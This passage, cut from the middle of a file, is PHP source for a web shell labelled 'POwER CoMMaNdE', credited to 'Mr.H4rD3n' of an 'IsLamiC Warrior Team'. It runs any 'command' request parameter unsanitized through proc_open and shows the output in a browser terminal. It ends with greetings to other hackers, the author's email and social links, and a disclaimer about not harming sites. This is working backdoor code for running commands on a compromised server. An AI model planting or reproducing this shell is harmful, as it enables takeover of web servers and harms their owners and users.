    $token = substr(@$_REQUEST['command'], 0, $length);
    if (isset($aliases[$token]))
    $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);

    $p = proc_open(@$_REQUEST['command'],
    array(1 => array('pipe', 'w'),
    2 => array('pipe', 'w')),
    $io);

    /* Read output sent to stdout. */
    while (!feof($io[1])) {
    $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),ENT_COMPAT, 'UTF-8');
    }
    /* Read output sent to stderr. */
    while (!feof($io[2])) {
    $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),ENT_COMPAT, 'UTF-8');
    }

    fclose($io[1]);
    fclose($io[2]);
    proc_close($p);
    }
    }
    } // end phpTerm

    /*##########################################################
    ## The main thing starts here
    ## All output ist XHTML
    ##########################################################*/

    $terminal=new phpTerm;

    @session_start();

    $terminal->initVars();
    $terminal->buildCommandHistory();
    $terminal->buildJavaHistory();
    if(!isset($_SESSION['prompt'])): $terminal->formatPrompt(); endif;
    $terminal->outputHandle($aliases);

    header('Content-Type: text/html; charset=UTF-8');
    echo '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
    /*##########################################################
    ## safe mode increase
    ## bloque fonction
    ##########################################################*/
    ?>

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
    <head>
    <title>\-( CMD Command )-/</title>

    <script type="text/javascript" language="JavaScript">
    var current_line = 0;
    var command_hist = new Array(<?php echo $_SESSION['js_command_hist']; ?>);
    var last = 0;

    function key(e) {
    if (!e) var e = window.event;

    if (e.keyCode == 38 && current_line < command_hist.length-1) {
    command_hist[current_line] = document.shell.command.value;
    current_line++;
    document.shell.command.value = command_hist[current_line];
    }

    if (e.keyCode == 40 && current_line > 0) {
    command_hist[current_line] = document.shell.command.value;
    current_line--;
    document.shell.command.value = command_hist[current_line];
    }

    }

    function init() {
    document.shell.setAttribute("autocomplete", "off");
    document.shell.output.scrollTop = document.shell.output.scrollHeight;
    document.shell.command.focus();
    }

    </script>
    <style type="text/css">
    body {font-family: sans-serif; color: black; background: white;}
    table{width: 600px; height: 300px; border: 1px #000000 solid; padding: 0px; margin: 0px;}
    td.head{background-color: #529ADE; color: #529ADE; font-weight:700; border: none; text-align: center; font-style: italic}
    textarea {width: 100%; border: none; padding: 2px 2px 2px; color: #529ADE; background-color: #000000;}
    p.prompt {font-family: monospace; margin: 0px; padding: 0px 2px 2px; background-color: #000000; color: #529ADE;}
    input.prompt {border: none; font-family: monospace; background-color: #000000; color: #529ADE;}
    </style>
    </head>

    <body onload="init()" style="background-color:#000000">

    <h2>POwER CoMMaNdE</h2>

    <?php if (empty($_REQUEST['rows'])) $_REQUEST['rows'] = 26; ?>

    </div>
    <div align="center">

    <table cellpadding="0" cellspacing="0">
    <tr><td class="head" style="color: #000000;"><b>PWD :</b></td>
    <td class="head"><?php echo $_SESSION['prompt'].":"."$_SESSION[cwd]"; ?>
    </td></tr>
    <tr><td width='100%' height='100%' colspan='2'><form name="shell" action="<?php echo $_SERVER['PHP_SELF'];?>" method="post">
    <textarea name="output" readonly="readonly" cols="85" rows="<?php echo $_REQUEST['rows'] ?>">
    <?php
    $lines = substr_count($_SESSION['output'], "\n");
    $padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
    echo rtrim($padding . $_SESSION['output']);
    ?>
    </textarea>
    <p class="prompt"><?php echo $_SESSION['prompt'].":>"; ?>
    <input class="prompt" name="command" type="text" onkeyup="key(event)" size="50" tabindex="1">
    </p>

    <? /*<p>
    <input type="submit" value="Execute Command" />
    <input type="submit" name="reset" value="Reset" />
    Rows: <input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" />
    </p>
    */?>
    </form></td></tr>
    </div>
    </table>

    </div>
    </body>
    </html>
    <?php ?><html><head><title>#Commanders - Private By Mr.H4rD3n - IsLamiC Warrior Team</title></head><body bgcolor="BLACK" background="http://localhost/a/matrix-animated-image.gif" style="background-color:#000000"></body></html></html><?php

    }
    //------------------------------------------------------------------------------------------------
    ?>

    <?php
    }
    // End Shell
    //-------------------------------------------------------------------------------------------------
    ?>
    <br /><br /><br /><font color="#23B627"><br />

    </font>

    <div class="end">
    <p align="center"><font color="#FFFFFF"><b>––•(-• © Copyright Mr.H4rD3n [All rights reserved] •-)•––</b><br />
    </font><font face="Verdana"><font color="#23B627">
    <a href="mailto:nadimzobaer@hotmail.com"><span style="text-decoration: none">
    <font color="#000000">My Email</font></span></a></font> | <font color="#23B627">
    <a href="http://facebook.com/nznbd"><span style="text-decoration: none">
    <font color="#000000">Facebook</font></span></a></a></font><a href="http://facebook.com/nznbd"><span style="text-decoration: none"><font color="#000000">
    </font></span></a>:) </font>
    <font color="#FFFFFF"> <br />
    \m/ <b>Greetz to</b> : Dr-AngeL - X-Line - Ghost.0f.Morocco - xMjahd - 4chrf -
    KhantastiC - X internet - And yOu ! \m/<br />
    &quot;&quot; WE ARE MUSLIMS, WE CAN NOT HARM ANY SITE I HOPE TO USE THIS TOOL ONLY WHAT
    PLEASE GOD "" </font>
    </p>
    </div>
    </body>
    </html>